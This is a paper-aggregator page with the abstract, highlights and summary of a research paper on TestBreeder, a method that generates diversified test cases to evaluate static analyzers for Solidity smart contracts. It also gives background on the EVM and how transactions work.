Abstract
We address the absence of reliable tests on contract analyzers of smart contracts and present a systematic method to diversify test cases by combining smart-contract-specific bugs and static analysis barriers in this paper. Using contract analyzers is the most practical solution for building a secure blockchain service, but they are relatively immature and lacking stable performance metrics. Traditionally, performance reports only compare static contract analyzers with pre-defined test cases, such as the Juliet test suite. However, building such test suites is burdensome for smart contracts, which are frequently change. In this paper, we propose an automated method to assess contract analyzers of smart contracts by diversifying test cases. In the experimental results, we identified nine erroneous alarms in the state-of-the-art contract analyzers with automatically generated test cases on five vulnerabilities.
Highlights
Smart contracts are at the core of blockchain services
We can summarize our contributions as follows: 1) We address the challenges of the current contract analyzers in dealing with the compound vulnerabilities of Solidity, which should be carefully considered in the current trends of smart contracts
EVALUATION we explain how resilient the existing contract analyzers are against the test cases generated by TestBreeder
Summary
Smart contracts are at the core of blockchain services. A smart contract is a program code that runs on top of the blockchain. The execution model of smart contracts is different from that for the general computing. A smart contract is deployed to a blockchain system in the compiled bytecode form. Immutability makes securing smart contracts more challenging because the second chance to amend errors is not allowed. This situation leads to adopting proactive protection using systemized and automated processes, which resemble the design process for the digital integrated circuits. Smart contracts update the shared state by executing the deployed code. Ethereum uses a virtual machine, called the ‘‘EVM,’’ as a runtime environment for smart contracts. Like a general computer program, developers write down the smart contract code in human-readable programming languages (e.g, Solidity and Vyper) and compile the code to the EVM-executable bytecode. A transaction is a cryptographically signed message containing a destination address, callvalue (the amount of the transferred digital asset), calldata (the general input data), execution fee (i.e., gas) related information, and so on
Sign-in/Register to view highlights & summary Sign-in/Register to access full text options 
Talk to us
Join us for a 30 min session where you can share your feedback and ask us any queries you have
Schedule a callDisclaimer: All third-party content on this website/platform is and will remain the property of their respective owners and is provided on "as is" basis without any warranties, express or implied. Use of third-party content does not indicate any affiliation, sponsorship with or endorsement by them. Any references to third-party content is to identify the corresponding services and shall be considered fair use under The CopyrightLaw.
